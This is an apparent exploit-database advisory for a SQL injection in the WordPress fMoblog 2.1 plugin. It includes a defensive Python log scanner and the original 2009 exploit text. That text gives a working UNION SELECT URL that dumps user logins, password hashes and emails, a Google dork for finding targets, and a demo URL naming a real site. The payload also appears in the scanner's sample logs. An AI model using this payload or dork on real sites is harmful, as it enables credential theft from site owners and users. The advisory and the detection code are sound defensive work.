Vendor: fmoblog
By: strange kevin
CVSS: 8.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: fmoblog
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:fahlstad:fmoblog:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

WordPress Plugin fMoblog Remote SQL Injection Vulnerability

The vulnerability exists because the 'id' parameter (sent alongside the 'page_id' variable to the 'index.php' script) is not sufficiently sanitized before being used in a database query. An attacker can inject arbitrary SQL code into this parameter to manipulate the query. Successful exploitation allows an attacker to read arbitrary data from the database, including password hashes and other sensitive information.
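The following is an added defender-side example, not code from the advisory or from the fMoblog plugin. It scans web server access log lines for requests whose 'id' parameter is not a plain integer, and labels the UNION-based pattern described above. The log lines are constructed for this example (the second one follows the shape of the published exploit URL); the regex for the log format assumes Apache/nginx combined-style lines. It also goes one step beyond the advisory by decoding percent-encoded query strings, so an encoded variant of the same payload is flagged too.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (not taken from the advisory). Lines 2 and 4
# carry a UNION-based payload in the 'id' parameter; lines 1 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Mar/2009:10:01:12 +0000] "GET /?page_id=20&id=17 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Mar/2009:10:01:40 +0000] "GET /?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- HTTP/1.1" 200 7348
203.0.113.5 - - [17/Mar/2009:10:02:03 +0000] "GET /?page_id=20&id=18 HTTP/1.1" 200 5098
203.0.113.12 - - [17/Mar/2009:10:02:30 +0000] "GET /?page_id=20&id=%2D1%20UNION%20SELECT%201%2C2%2C3 HTTP/1.1" 500 612
"""

# Assumed combined-log layout: client ip, identd, user, [timestamp], "METHOD target PROTO", status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# UNION ... SELECT with anything (spaces, comments, 'all') in between, case-insensitive.
UNION_RE = re.compile(r'\bunion\b[\s\S]{0,40}?\bselect\b', re.IGNORECASE)


def classify_request(target):
    """Return a reason string when the 'id' query parameter looks injected, else None.

    The primary check is an allowlist: a legitimate fMoblog id is a plain integer.
    Anything else is suspicious; the UNION regex only names the well-known pattern.
    """
    # parse_qs percent-decodes values and turns '+' into spaces, so encoded
    # payloads are compared in their decoded form.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("id", []):
        if re.fullmatch(r"\d+", value):
            continue  # benign numeric id
        if UNION_RE.search(value):
            return "union-based SQL injection in 'id'"
        return "non-numeric 'id'"
    return None


def scan_log(text):
    """Parse each log line and return a list of hits for suspicious 'id' values."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        reason = classify_request(m.group("target"))
        if reason:
            hits.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": m.group("status"),
                "reason": reason,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} HTTP {hit['status']}: {hit['reason']}")
```

The integer allowlist is the part worth keeping: it catches payloads that avoid the literal UNION/SELECT spelling, while the regex merely attaches a recognisable label. Note that a 200 status on the injected request (as in the second sample line) is consistent with the data-extraction behaviour the advisory describes, so status codes alone are not a useful filter here.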

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of the plugin.

Exploit-DB raw data:

#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################

# milw0rm.com [2009-03-17]